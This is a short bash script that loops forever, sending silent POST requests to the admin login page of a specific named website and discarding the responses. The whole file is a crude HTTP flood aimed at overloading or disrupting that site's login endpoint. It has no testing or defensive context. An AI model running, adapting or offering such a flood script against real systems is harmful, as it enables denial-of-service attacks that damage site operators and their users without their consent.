#!/bin/bash
for ((;;))
  do
     curl -s  -X POST "http://admin.999yzb.com/admin/login" >> /dev/null
done
